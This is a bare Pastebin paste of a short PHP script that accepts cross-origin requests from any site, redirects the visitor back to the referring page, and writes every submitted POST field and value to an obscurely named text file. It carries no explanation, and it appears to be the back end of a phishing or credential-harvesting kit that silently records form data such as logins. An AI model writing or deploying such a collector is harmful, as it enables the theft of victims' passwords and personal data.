Advertisement
Guest User

Untitled

a guest
May 16th, 2019
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. <?php
  2. header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN'] . "");
  3. header ('Location:'.$_SERVER['HTTP_REFERER']);
  4.  
  5. $handle = fopen("_a128x64x32w.txt", "a");
  6. foreach($_POST as $variable => $value) {
  7. fwrite($handle, $variable);
  8. fwrite($handle, "=");
  9. fwrite($handle, $value);
  10. fwrite($handle, "\r\n");
  11. }
  12. fwrite($handle, "\r\n");
  13. fclose($handle);
  14. exit;
  15. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement